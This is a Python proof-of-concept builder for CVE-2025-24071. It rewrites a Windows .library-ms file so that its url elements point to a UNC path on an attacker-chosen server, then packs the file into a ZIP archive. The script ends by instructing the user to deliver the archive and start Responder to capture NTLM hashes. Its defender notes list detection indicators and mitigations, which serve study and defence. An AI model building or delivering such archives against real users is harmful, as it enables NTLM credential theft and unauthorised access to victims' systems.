"""Proof-of-concept builder for CVE-2025-24071 (see the argparse description below).

The script takes a Windows ``.library-ms`` file, rewrites every ``url`` element in it
to a UNC path under ``--server``, and packs the result into a ZIP archive.

Defender notes (review):
  * The artifact to look for is a ``.library-ms`` file inside an archive whose ``url``
    element is a UNC path (``\\\\host\\share``) to a host outside the organisation.
  * A UNC path of that form is normally resolved over SMB, so the observable effect
    is an outbound SMB connection from the client to ``--server``; blocking outbound
    TCP 445 at the perimeter and applying the vendor fix for CVE-2025-24071 are the
    standard mitigations.  Archive-inspection tooling can flag ``.library-ms``
    members with remote ``url`` values.
"""
from os import rename
from os.path import isfile
from zipfile import ZipFile
import xml.etree.ElementTree as elementTree
import argparse

#pretty colors :)  -- ANSI escape sequences used only for console output
RESET = "\033[0m"
RED = "\033[31m"
GREEN = "\033[32m"
YELLOW = "\033[33m"
BOLD = "\033[1m"

def findLib(library):
    """Return the ``.library-ms`` file name to work on, creating it by rename if missing.

    Args:
        library: user-supplied name; ``.library-ms`` is appended when absent.

    Returns:
        The (possibly suffixed) file name.

    Raises:
        SystemExit: wrapping the OSError if renaming ``mal.library-ms`` to the
            requested name fails (the error is printed first).
    """
    if not library.endswith(".library-ms"):
        library = library + ".library-ms"
    if isfile(library):
        pass
    else:
        # No file of that name yet: the bundled "mal.library-ms" template in the
        # current directory is renamed to it.  The template must already exist here.
        try:
            rename("mal.library-ms", library)
        # PermissionError and IsADirectoryError are subclasses of OSError, so the
        # tuple is wider than needed; the except clause still only matches OSError.
        except (OSError, PermissionError, IsADirectoryError) as error:
            print(f"{BOLD}{RED}[-]{RESET} Error renaming library!")
            raise SystemExit(error)
    return library

def malLib(library, server):
    """Rewrite every ``url`` element of the library file to point at ``server``.

    Args:
        library: path to the ``.library-ms`` XML file (parsed and overwritten in place).
        server: host name or IP placed into the UNC path ``\\\\<server>\\shared``.

    Raises:
        FileNotFoundError / ParseError: propagated from ElementTree if the file is
            missing or not well-formed XML (nothing here catches them).
    """
    contents = elementTree.parse(library)
    root = contents.getroot()
    # The root tag looks like "{namespace}tag"; extract the namespace URI so it can
    # be re-registered as the default namespace and written back without a prefix.
    nameSpace = root.tag.split("}")[0].strip("{")
    elementTree.register_namespace('', nameSpace)
    for element in root.iter():
        # Matches any tag whose local name ends in "url" (namespace-qualified or not).
        if element.tag.endswith("url"):
            # This remote UNC reference is the indicator defenders should key on.
            element.text = "\\\\" + server + "\\shared"
    contents.write(library, encoding="utf-8", xml_declaration=True)

def mkZip(library, filename):
    """Write ``library`` into a new ZIP archive named ``filename``.

    Args:
        library: path of the file to add; it is stored under that same path
            inside the archive (ZipFile.write default arcname).
        filename: output archive name; ``.zip`` is appended when absent.
            Mode "w" truncates any existing archive of that name.
    """
    if not filename.endswith(".zip"):
        filename = filename + ".zip"
    with ZipFile(filename, "w") as malZip:
        malZip.write(library)

if __name__ == "__main__":
    parser = argparse.ArgumentParser(prog='CVE-2025-24071.py', description='This is a PoC for CVE-2025-24071, a bug in Windows Explorer that allows for NTLM hash disclosure via crafted archives.', epilog='PoC by 0xVoodoo - Don\'t be a skid :)' )
    parser.add_argument('-s', '--server', required=True, help='Target IP/URL')
    parser.add_argument('-f', '--file', required=True, help='Output file name')
    parser.add_argument('-l', '--library', help='MS Library file name (default mal.library-ms)')
    args = parser.parse_args()
    print("===CVE-2025-24071 PoC by 0xVoodoo===")
    # Without -l the script expects "mal.library-ms" in the current directory;
    # findLib (and its rename fallback) is only consulted when a name is given.
    if args.library:
        library = findLib(args.library)
    else:
        library = "mal.library-ms"
    print(f"{BOLD}{YELLOW}[*]{RESET} Modifying library")
    malLib(library, args.server)
    print(f"{BOLD}{YELLOW}[*]{RESET} Creating ZIP archive")
    mkZip(library, args.file)
    print(f"{BOLD}{GREEN}[+]{RESET} ZIP archive created:", args.file)
    print(f"{BOLD}{YELLOW}[*]{RESET} Deliver the ZIP archive and start responder")